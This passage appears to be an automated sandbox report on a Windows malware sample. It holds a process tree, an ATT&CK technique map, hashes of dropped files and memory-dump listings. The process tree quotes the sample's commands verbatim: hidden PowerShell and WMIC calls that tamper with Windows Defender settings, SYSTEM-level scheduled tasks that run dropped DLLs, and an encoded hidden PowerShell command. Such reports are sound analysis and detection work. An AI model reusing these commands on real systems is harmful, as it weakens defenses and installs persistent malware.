"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True" & forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True" &
3⤵
PID:2888

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True"
4⤵
PID:2704

C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
5⤵
PID:1076

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
6⤵
- Command and Scripting Interpreter: PowerShell
PID:1800

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=exe Force=True
7⤵
PID:1496

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True"
4⤵
PID:872

C:\Windows\SysWOW64\cmd.exe
/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
5⤵
PID:2716

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
6⤵
- Command and Scripting Interpreter: PowerShell
PID:2296

C:\Windows\SysWOW64\Wbem\WMIC.exe
"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Remove ExclusionExtension=wsf Force=True
7⤵
PID:2812

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TR "rundll32 \"C:\Program Files (x86)\ADJLsahCU\AUVjUl.dll\",#1" /RU "SYSTEM" /SC ONLOGON /TN "FPieTEPPuEmJrhC" /V1 /F
3⤵
- Creates scheduled task(s)
PID:1264

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "FPieTEPPuEmJrhC2" /F /xml "C:\Program Files (x86)\ADJLsahCU\TngItZE.xml" /RU "SYSTEM"
3⤵
- Creates scheduled task(s)
PID:2192

C:\Windows\SysWOW64\schtasks.exe
schtasks /END /TN "FPieTEPPuEmJrhC"
3⤵
PID:2292

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "FPieTEPPuEmJrhC"
3⤵
PID:2888

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "RMEgILKoRohUOb" /F /xml "C:\Program Files (x86)\DQANlvmTAvZU2\SwuJMnv.xml" /RU "SYSTEM"
3⤵
- Creates scheduled task(s)
PID:2932

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "zeKFSgsyWsBDI2" /F /xml "C:\ProgramData\VyWMmqtuSNndeGVB\IqEFPwv.xml" /RU "SYSTEM"
3⤵
- Creates scheduled task(s)
PID:1700

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "VMffJjKqhXQmtrZGW2" /F /xml "C:\Program Files (x86)\AymmxTCbqblaRZJGVqR\AXzXENi.xml" /RU "SYSTEM"
3⤵
- Creates scheduled task(s)
PID:1704

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "iNxHEAmPUdTkVvEiVFU2" /F /xml "C:\Program Files (x86)\PZjcxajBIsNTC\dUbPCXy.xml" /RU "SYSTEM"
3⤵
- Creates scheduled task(s)
PID:1568

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "rrqYunoktxOQmCoCX" /SC once /ST 00:29:05 /RU "SYSTEM" /TR "rundll32 \"C:\Windows\Temp\WPGfhLqOzAIwKSwi\pTgBsfXC\lVeNSSb.dll\",#1 /WPdidYYD 385118" /V1 /F
3⤵
- Creates scheduled task(s)
PID:1632

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "rrqYunoktxOQmCoCX"
3⤵
PID:1604

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "XyyyteIMwZeutaZuw"
3⤵
PID:1928

C:\Windows\system32\rundll32.EXE
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\WPGfhLqOzAIwKSwi\pTgBsfXC\lVeNSSb.dll",#1 /WPdidYYD 385118
2⤵
PID:2744

C:\Windows\SysWOW64\rundll32.exe
C:\Windows\system32\rundll32.EXE "C:\Windows\Temp\WPGfhLqOzAIwKSwi\pTgBsfXC\lVeNSSb.dll",#1 /WPdidYYD 385118
3⤵
PID:1856

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "rrqYunoktxOQmCoCX"
4⤵
PID:1264

C:\Windows\system32\taskeng.exe
taskeng.exe {411D80C8-51CB-4E3B-AF1A-7343C16AFDE2} S-1-5-21-2737914667-933161113-3798636211-1000:PUMARTNR\Admin:Interactive:[1]
1⤵
PID:2764

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
2⤵
- Command and Scripting Interpreter: PowerShell
PID:304

C:\Windows\system32\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
3⤵
PID:3024

C:\Windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
PID:2772

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

System Services

T1569

Service Execution

T1569.002

Scheduled Task/Job

T1053

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Pre-OS Boot

T1542

Bootkit

T1542.003

Scheduled Task/Job

T1053

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Scheduled Task/Job

T1053

Defense Evasion

Modify Registry

T1112

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Pre-OS Boot

T1542

Bootkit

T1542.003

Subvert Trust Controls

T1553

Install Root Certificate

T1553.004

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Web Service

T1102

Impact

Service Stop

T1489

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files (x86)\ADJLsahCU\TngItZE.xml
Filesize
2KB

MD5
0f58a01d0305df35e9fe0045566a9656

SHA1
79b1206bbeb5138f856eae7bc901e04210e4d39a

SHA256
1c75ce8e8894b3671e8cde364ade7adc6a481eaf9bc96d1733b9532c567eecd2

SHA512
6f09f54a6168a251554c40e06a2583d1c7dcca6b1b302228500a26c1827ea273015f2bb08431a673cf6e48278d13a28560de5200c572ea13c6fb276dd3069386

Download Submit
C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi
Filesize
2.0MB

MD5
da80addcd9a1f0b501c2415d0ea45329

SHA1
52676186a194cfdf9863dc251ae91490ce1a5128

SHA256
f4a447883c2d692391e101dcdc8083ae96631eb314508d73bd5103ad41f73937

SHA512
11779942f2f1517e652e52e2e9c41f4ee945be5476ed5252af0dc730a49fc8da605f6ce97a1850742157ca8364702528bec597d0480d6fe7263d929fea32e756

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
d47ecbcdf62d36f4bd3cd51cc5f6a208

SHA1
2f98cc1315f57a6d11b274f861dfbb3ea03badbc

SHA256
81753578660900b180405d9366a4c4499bc754d4c4268ef1b8bd2d94ff53caeb

SHA512
b79c9b9f0e6da3d478d136fcc1ce09a2872fda5fa76c201b340942a03d8a7c899635cfbb6c1dac6a9e86adaa6e2b0f78a55e393f9c516f614ad249165b5c9b7d

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize
344B

MD5
de065975430d8f9669a6903ac679ae4a

SHA1
ecf8f3a4577390d95229dcc371bebd032b3396a2

SHA256
879afa76867811768153ba8dd75561522e5abe8567fe2d9b1f49588f12ad6544

SHA512
775c42c0bd022da61765332bbc3bde1ba3639fc8e44724fe3e3e57eb0e411467bc600cb387646f3d41d0e6be315520ced0d329543636cf6690d711389458d47d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_GB\messages.json
Filesize
187B

MD5
2a1e12a4811892d95962998e184399d8

SHA1
55b0ae8a7b5a5d6094827ede8e6a1d26d4b4a720

SHA256
32b4406692c26b540fea815a9bb56df1f164140cd849e8025930b7425036cceb

SHA512
bb54d5e8684a6bfeac559b7c7a7551eed6a8a43a4c6464218cb0adb1c89fea124b69760690c3124af86fa68ac3fdbe903eaa098f0af2b6a58f4702c803abc089

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fa\messages.json
Filesize
136B

MD5
238d2612f510ea51d0d3eaa09e7136b1

SHA1
0953540c6c2fd928dd03b38c43f6e8541e1a0328

SHA256
801162df89a8ad2b1a51de75e86eba3958b12960660960a5ffafe9bc55bc293e

SHA512
2630dd7a3c17dc963b1a71d81295cf22f8b3838748b55c433318e1e22f5b143a6d374ca2e5a8420659fa130200fbaa4814d0f093b1eca244b5635a3b99878e1c

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\pt_BR\messages.json
Filesize
150B

MD5
0b1cf3deab325f8987f2ee31c6afc8ea

SHA1
6a51537cef82143d3d768759b21598542d683904

SHA256
0ec437af3f59fef30355cf803966a2b9a0cd9323d390297496f750775995a6bf

SHA512
5bc1f5a2d38f4a071513e2ac25b241c8e5584bed8d77e7fc4194855898d51a328dd73200f5aae6c9bc1b2a304e40e56bc686192074bd8a1bcc98f4971dee428f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
Filesize
10KB

MD5
801178dc675bdd9f1c5f1761af96cb92

SHA1
b12a95c1c810c4cef7e3cfb58d22ba51b9b1b623

SHA256
baa22cbadcf8b4efaa05fecc6aac53be8855b99313e210e5b3291f28f34f76d4

SHA512
3dd97a1dd5986c11578103ae216a5af4a842a8a8826de9d829bce424888716074b115da65a97e52f0a9e5c3346be486a80812a6b2b7dd65c7bc63ae96a03f89a

Download Submit
C:\Users\Admin\AppData\Local\Temp\[email protected]
Filesize
656B

MD5
184a117024f3789681894c67b36ce990

SHA1
c5b687db3b27ef04ad2b2cbc9f4e523cb7f6ba7e

SHA256
b10d5fef165fc89e61cd16e02eac1b90b8f94ef95218bdd4b678cd0d5c8a925e

SHA512
354d3bbc1329cbbe30d22f0cf95564e44acc68d6fe91e2beb4584a473d320faf4c092de9db7f1f93cf0b235703fc8de913883985c7d5db6b596244771a1edaf7

Download Submit
C:\Users\Admin\AppData\Local\Temp\[email protected]\setup.ini
Filesize
830B

MD5
e6edb41c03bce3f822020878bde4e246

SHA1
03198ad7bbfbdd50dd66ab4bed13ad230b66e4d9

SHA256
9fa80f0889358d9db3d249a2e747e27b7c01c6123b784d94d169c0e54cacf454

SHA512
2d71b7d50212f980e82562af95598c430aa0875f7a9d9cc670ba2cb1f63057fb26fd747a99cb4ca08f2355d002daa79bda2236b3ad9e37a3cfef32ae5420e2a1

Download Submit
C:\Users\Admin\AppData\Local\Temp\1716254684_00000000_base\360base.dll
Filesize
1.0MB

MD5
b192f34d99421dc3207f2328ffe62bd0

SHA1
e4bbbba20d05515678922371ea787b39f064cd2c

SHA256
58f13d919f44d194827b609b6b267246abc47134bb202472c0dfe033b9d7ed73

SHA512
00d4c7a0a0097eb4b31a71a0eaf6ff0d44619f77a335c75688565e34e6d7f4fb6c258917457d560c6b0a5077603845ce012e01d9862e87fb5327d7f8da970f95

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zSCC83.tmp\calc.exe
Filesize
44KB

MD5
2f82623f9523c0d167862cad0eff6806

SHA1
5d77804b87735e66d7d1e263c31c4ef010f16153

SHA256
9c2c8a8588fe6db09c09337e78437cb056cd557db1bcf5240112cbfb7b600efb

SHA512
7fe8285e52355f2e53650dc4176f62299b8185ed7188850e0a566ddef7e77e1e88511bdcf6f478c938acef3d61d8b269e218970134e1ffc5581f8c7be750c330

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zSCC83.tmp\changepk.exe
Filesize
122KB

MD5
ee0f08f2b1799960786efc38f1d212d5

SHA1
c6708b30c974cd326ea540415bae0666d6a0780a

SHA256
c6929b7dd7ead3bddb12f3fb953602464c426425a354ce7ab0b77cc53f696a36

SHA512
8cc5aca4db093884a47d31243f1278c0e2360bed6b6cbec6d7dd7ac1170f05f3bd0493a04ef59cd93fb16836b4785f9ffa0e7ebdd45b085244c58fe1fbbcca67

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab4185.tmp
Filesize
68KB

MD5
29f65ba8e88c063813cc50a4ea544e93

SHA1
05a7040d5c127e68c25d81cc51271ffb8bef3568

SHA256
1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

SHA512
e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar41B7.tmp
Filesize
177KB

MD5
435a9ac180383f9fa094131b173a2f7b

SHA1
76944ea657a9db94f9a4bef38f88c46ed4166983

SHA256
67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

SHA512
1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
5d4e6a3358f47f15ca1715384b5f9f41

SHA1
8d8407ac8d158ad43b39d8622d7a19fbd189ede9

SHA256
48acdafcde63c9b44aafa175d037cb5f8e6eb5aae318fee1a2ae4eeb0f5f9744

SHA512
f85e2282294bc26141f7726ab052ce35daf776a00e038277f8cbe956c4716a56a6631e99081aab4d3fef1bb39ea6a0c4e31313436eb5b16cd0a24921c986cb68

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB

MD5
e37fdd1aecdff22fadf601fee11c5e28

SHA1
4b95350f73c9c442e4e1649b6560d073c76d9109

SHA256
849a864eadae84a532a043328728d82bb2aa1d41ac26be30513e8ace56d70307

SHA512
f3d67e5ded2bf92d00f41d446e8bba1a4b0014125d918c3bb2c6513e5684dea6d36262f99aeee9abb8079d0d4f003bc52c14f803f40ba5f313fb7dbb50b4fac4

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize
7KB

MD5
2252cfeaa3e94a4d33fa02f568fb8e7d

SHA1
afb73d898dcc9ab7e19d2d6e0e5342cc10deb916

SHA256
d2fdb2dada3399bc3fcc9ef22d566f9c5d3d3f1ed7cbd18bca5b5671b1b0eab2

SHA512
3e3e423c946cc4151c8a03c7be12e7241a74556ce24fd48d0fc96a735e198a0b1d48f6f84c03a03f6035085e9cbd9d7f0849c10af103fed4e66982f6a9bcab04

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize
7KB

MD5
742c4fcee5b366e2052e812e1fc6e28f

SHA1
dcefcc93766a4c3a6bd12dd428293d6878f8f1e1

SHA256
b6c6fdd5969cfb09550684053dba186756fbba09fa248d11b1b19b4596447b70

SHA512
1ccd20ffdd71e3cc92c3c1d8a14be5d7af3ef70429dd2d214c5f3ee1731304f16eefecc9a3de0c095a18eb4fd78c621967389b026026ce0d956ec215ce5372f0

Download Submit
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\uu0g08su.default-release\prefs.js
Filesize
7KB

MD5
6a49cfac8481021878aea90982000763

SHA1
8dde674aa055b42fa4c3062e6bfed9981edabe81

SHA256
37cabb739a6becfdacbafdea7273bcd99778a09fbc448dff7e00902612dd8b9e

SHA512
846dad2e6b0f400d9801bfc9fd3e35a6c76e3484cccb2558a827a79fe7feedcf09ddf78b707b91e8e864f475546b3f55ab5835b9de78be10a5ec9bf6dad685dd

Download Submit
C:\Windows\SysWOW64\GroupPolicygzBKW\gpt.ini
Filesize
11B

MD5
ec3584f3db838942ec3669db02dc908e

SHA1
8dceb96874d5c6425ebb81bfee587244c89416da

SHA256
77c7c10b4c860d5ddf4e057e713383e61e9f21bcf0ec4cfbbc16193f2e28f340

SHA512
35253883bb627a49918e7415a6ba6b765c86b516504d03a1f4fd05f80902f352a7a40e2a67a6d1b99a14b9b79dab82f3ac7a67c512ccf6701256c13d0096855e

Download Submit
C:\Windows\Tasks\bbmnnUCIPYyTQrzMQJ.job
Filesize
500B

MD5
4b6e07617054071e5b0cbf43433e5c8f

SHA1
0c34a16910121bb2983d299a9b91b72c8fae4d12

SHA256
ab3a221f738b2e1dbbde3699872bf76fe8466136e2c067ab1d0fba43bdd29063

SHA512
e190ab7b094c036981d1d62837cc3d5af093949713502fd56411ecfd95d35aa66b865e45d5bafda495dd99f37231baa826974cb75a8d47a8aa76f418bf070140

Download Submit
C:\Windows\Temp\WPGfhLqOzAIwKSwi\SGHzTzIe\wGCGFdJYIdUaXxTH.wsf
Filesize
9KB

MD5
40bc3b95e006ed3d4efbf0dab5aa6799

SHA1
f95a49e6aa2d28d0e73fe0857aeda994d00cb2a0

SHA256
cccbe4f624d03bd261390e59630408e01381962f7b90e0d5540c66a0ae4e1979

SHA512
b271e2d3f70faedbd4493c08915bb21c5dfe0bc256bbc4a8fdd8d0fdcc4a4ce189c21fab8ec7ecb8bf9933c274217ba5efcc1cf68123809ea8072b0c5fe9de44

Download Submit
C:\Windows\system32\GroupPolicy\Machine\Registry.pol
Filesize
6KB

MD5
551cbdb771dcb62e63502a51f98b4661

SHA1
9f4f8ff39b8b82d2aae2007d6da1060ea88fc0d1

SHA256
14090556ee2f828f86084f194dcec57625cfba05e48a5bfecd228230fe46e4b2

SHA512
2e27926b0f2106df6fa62a052dd6952cf331fab707c3067f66653b1de8ee831df732d669a595e68ee7729e77d5cedfea881cc0108cec9249f4a7bd98739734a5

Download Submit
C:\Windows\system32\GroupPolicy\Machine\Registry.pol
Filesize
8KB

MD5
f0030740ef193d320a527604415bcebf

SHA1
76095627b983d9440fa52a621e2961d234c51020

SHA256
8424bd1977677a09f2c444506024b22b7807184d781ca6e8d0091e9c075382b7

SHA512
7eebb52bfcdd1acd3428d4e043b2a64d2a84039423254e8c910d3f43a305d4614089f851702d3384ee637fe54a976e13adeafb6f2f45ec7aed628ae959dab5ef

Download Submit
C:\Windows\system32\GroupPolicy\gpt.ini
Filesize
268B

MD5
a62ce44a33f1c05fc2d340ea0ca118a4

SHA1
1f03eb4716015528f3de7f7674532c1345b2717d

SHA256
9f2cd4acf23d565bc8498c989fccccf59fd207ef8925111dc63e78649735404a

SHA512
9d9a4da2df0550afdb7b80be22c6f4ef7da5a52cc2bb4831b8ff6f30f0ee9eac8960f61cdd7cfe0b1b6534a0f9e738f7eb8ea3839d2d92abeb81660de76e7732

Download Submit
C:\Windows\system32\drivers\etc\hosts
Filesize
2KB

MD5
3e9af076957c5b2f9c9ce5ec994bea05

SHA1
a8c7326f6bceffaeed1c2bb8d7165e56497965fe

SHA256
e332ebfed27e0bb08b84dfda05acc7f0fa1b6281678e0120c5b7c893a75df47e

SHA512
933ba0d69e7b78537348c0dc1bf83fb069f98bb93d31c638dc79c4a48d12d879c474bd61e3cbde44622baef5e20fb92ebf16c66128672e4a6d4ee20afbf9d01f

Download Submit
\??\PIPE\srvsvc
MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\Users\Admin\AppData\Local\Temp\7zSB04C.tmp\Install.exe
Filesize
6.4MB

MD5
220a02a940078153b4063f42f206087b

SHA1
02fc647d857573a253a1ab796d162244eb179315

SHA256
7eb93d93b03447a6bafd7e084305d41bf9780bd415cb2e70020952d06f3d7b60

SHA512
42ac563a7c28cbf361bfb150d5469f0278ab87ce445b437eef8425fb779689d70230b550815f30f9db2909c1ba0dd015b172dfe3e718d26706856f4cb0eeeeaa

Download Submit
\Users\Admin\AppData\Local\Temp\{FFD2733E-E632-468f-8A56-8B7E46E66DBC}.tmp\360P2SP.dll
Filesize
824KB

MD5
fc1796add9491ee757e74e65cedd6ae7

SHA1
603e87ab8cb45f62ecc7a9ef52d5dedd261ea812

SHA256
bf1b96f5b56be51e24d6314bc7ec25f1bdba2435f4dfc5be87de164fe5de9e60

SHA512
8fa2e4ff5cbc05034051261c778fec1f998ceb2d5e8dea16b26b91056a989fdc58f33767687b393f32a5aff7c2b8d6df300b386f608abd0ad193068aa9251e0d

Download Submit
\Users\Admin\Pictures\86HUE2y4YsytNX1op0d40Qrp.exe
Filesize
1.5MB

MD5
cd4acedefa9ab5c7dccac667f91cef13

SHA1
bff5ce910f75aeae37583a63828a00ae5f02c4e7

SHA256
dd0e8944471f44180dd44807d817e0b8a1c931fc67d48278cdb7354d98567e7c

SHA512
06fae66da503eb1b9b4fbe63a5bb98c519a43999060029c35fe289e60b1cb126a6278c67ce90f02e05b893fcaea6d54f9deb65bc6da82561487a7754f50c93d1

Download Submit
\Users\Admin\Pictures\J3Bd05kGcdWhqmPKAo19DW1R.exe
Filesize
2.6MB

MD5
3d233051324a244029b80824692b2ad4

SHA1
a053ebdacbd5db447c35df6c4c1686920593ef96

SHA256
fbd467ce72bca00eea3aaa6f32abc8aca1a734030d082458e21e1fe91e6a8d84

SHA512
7f19c6400ac46556a9441844242b1acb0b2f11a47f5d51f6d092406a8c759a6d78c578bb5b15035e7cd1cdb3035acf0db884708b0da1a83eb652a50a68e3a949

Download Submit
\Users\Admin\Pictures\llnS9RqKK778oo6e03psvyNr.exe
Filesize
6.2MB

MD5
5cc472dcd66120aed74de36341bfd75a

SHA1
1dfc4d42da90fe070d4474ddd7fa7b6f6ffa97ab

SHA256
958dd14c90b1c73852f926608f212377aa3a36666c04024f97c20deb375e9773

SHA512
b5cf358d95ec9a6cca81d2e9c23f0ede93ab94963bb5c626f4e6233a06cedae63b73dd81d2455acb29b003c3b4e2f54da6010daebc4639a3dcc54314d4fe4f81

Download Submit
\Users\Admin\Pictures\xiHRfnBKizFr8TNGB2AWFI2t.exe
Filesize
7.4MB

MD5
4fadc908554eeb6532386f7d1af217e4

SHA1
0c50cec9bc1ade05467b6ac20dab7f0bd630de30

SHA256
a7b9148fce1c28eeda96ee8807b8eb74165408eaa0aa1b7eb18e180867c82eaa

SHA512
fa938bb198367724051ab64e1fa94efdcb2102506014f73772113c9f96d17fc07d73b26370e7c992ccee6da7eba395c04f7ac67186c705827d05084e8781fe5f

Download Submit
memory/304-389-0x0000000001DE0000-0x0000000001DE8000-memory.dmp

Filesize
32KB

Download
memory/304-388-0x000000001B740000-0x000000001BA22000-memory.dmp

Filesize
2.9MB

Download
memory/920-254-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/920-258-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/920-257-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/920-261-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/920-256-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/920-255-0x0000000140000000-0x000000014000E000-memory.dmp

Filesize
56KB

Download
memory/940-298-0x0000000002300000-0x000000000296E000-memory.dmp

Filesize
6.4MB

Download
memory/1000-306-0x00000000014B0000-0x0000000001B1E000-memory.dmp

Filesize
6.4MB

Download
memory/1000-305-0x0000000000370000-0x00000000009DE000-memory.dmp

Filesize
6.4MB

Download
memory/1000-676-0x0000000000370000-0x00000000009DE000-memory.dmp

Filesize
6.4MB

Download
memory/1000-367-0x0000000000370000-0x00000000009DE000-memory.dmp

Filesize
6.4MB

Download
memory/1488-154-0x0000000000170000-0x0000000000171000-memory.dmp

Filesize
4KB

Download
memory/1488-159-0x0000000000180000-0x0000000000181000-memory.dmp

Filesize
4KB

Download
memory/1488-132-0x0000000000130000-0x0000000000131000-memory.dmp

Filesize
4KB

Download
memory/1488-130-0x0000000000130000-0x0000000000131000-memory.dmp

Filesize
4KB

Download
memory/1488-149-0x0000000000160000-0x0000000000161000-memory.dmp

Filesize
4KB

Download
memory/1488-152-0x0000000000170000-0x0000000000171000-memory.dmp

Filesize
4KB

Download
memory/1488-135-0x0000000000140000-0x0000000000141000-memory.dmp

Filesize
4KB

Download
memory/1488-147-0x0000000000160000-0x0000000000161000-memory.dmp

Filesize
4KB

Download
memory/1488-157-0x0000000000180000-0x0000000000181000-memory.dmp

Filesize
4KB

Download
memory/1488-134-0x0000000000130000-0x0000000000131000-memory.dmp

Filesize
4KB

Download
memory/1488-160-0x0000000000190000-0x0000000000191000-memory.dmp

Filesize
4KB

Download
memory/1488-162-0x0000000000190000-0x0000000000191000-memory.dmp

Filesize
4KB

Download
memory/1488-164-0x0000000000190000-0x0000000000191000-memory.dmp

Filesize
4KB

Download
memory/1488-165-0x0000000000C20000-0x00000000019C0000-memory.dmp

Filesize
13.6MB

Download
memory/1488-144-0x0000000000150000-0x0000000000151000-memory.dmp

Filesize
4KB

Download
memory/1488-137-0x0000000000140000-0x0000000000141000-memory.dmp

Filesize
4KB

Download
memory/1488-139-0x0000000000140000-0x0000000000141000-memory.dmp

Filesize
4KB

Download
memory/1488-142-0x0000000000150000-0x0000000000151000-memory.dmp

Filesize
4KB

Download
memory/1516-370-0x00000000023E0000-0x0000000002A4E000-memory.dmp

Filesize
6.4MB

Download
memory/1516-335-0x00000000023E0000-0x0000000002A4E000-memory.dmp

Filesize
6.4MB

Download
memory/1860-371-0x0000000000820000-0x0000000000E8E000-memory.dmp

Filesize
6.4MB

Download
memory/1860-392-0x0000000000820000-0x0000000000E8E000-memory.dmp

Filesize
6.4MB

Download
memory/1860-399-0x0000000000820000-0x0000000000E8E000-memory.dmp

Filesize
6.4MB

Download
memory/1936-251-0x00000000009D0000-0x00000000009D8000-memory.dmp

Filesize
32KB

Download
memory/1936-250-0x0000000019E50000-0x000000001A132000-memory.dmp

Filesize
2.9MB

Download
memory/2204-12-0x0000000000400000-0x0000000000408000-memory.dmp

Filesize
32KB

Download
memory/2204-16-0x0000000000400000-0x0000000000408000-memory.dmp

Filesize
32KB

Download
memory/2204-17-0x0000000000400000-0x0000000000408000-memory.dmp

Filesize
32KB

Download
memory/2204-19-0x0000000000400000-0x0000000000408000-memory.dmp

Filesize
32KB

Download
memory/2204-21-0x0000000000400000-0x0000000000408000-memory.dmp

Filesize
32KB

Download
memory/2204-14-0x0000000000400000-0x0000000000408000-memory.dmp

Filesize
32KB

Download
memory/2204-23-0x0000000000400000-0x0000000000408000-memory.dmp

Filesize
32KB

Download
memory/2204-18-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

Filesize
4KB

Download
memory/2212-24-0x000000001B760000-0x000000001BA42000-memory.dmp

Filesize
2.9MB

Download
memory/2212-28-0x000007FEEDBD0000-0x000007FEEE56D000-memory.dmp

Filesize
9.6MB

Download
memory/2212-25-0x00000000028F0000-0x00000000028F8000-memory.dmp

Filesize
32KB

Download
memory/2212-27-0x000007FEEDBD0000-0x000007FEEE56D000-memory.dmp

Filesize
9.6MB

Download
memory/2212-30-0x000007FEEDBD0000-0x000007FEEE56D000-memory.dmp

Filesize
9.6MB

Download
memory/2212-29-0x000007FEEDBD0000-0x000007FEEE56D000-memory.dmp

Filesize
9.6MB

Download
memory/2212-26-0x000007FEEDBD0000-0x000007FEEE56D000-memory.dmp

Filesize
9.6MB

Download
memory/2212-11-0x000007FEEDE8E000-0x000007FEEDE8F000-memory.dmp

Filesize
4KB
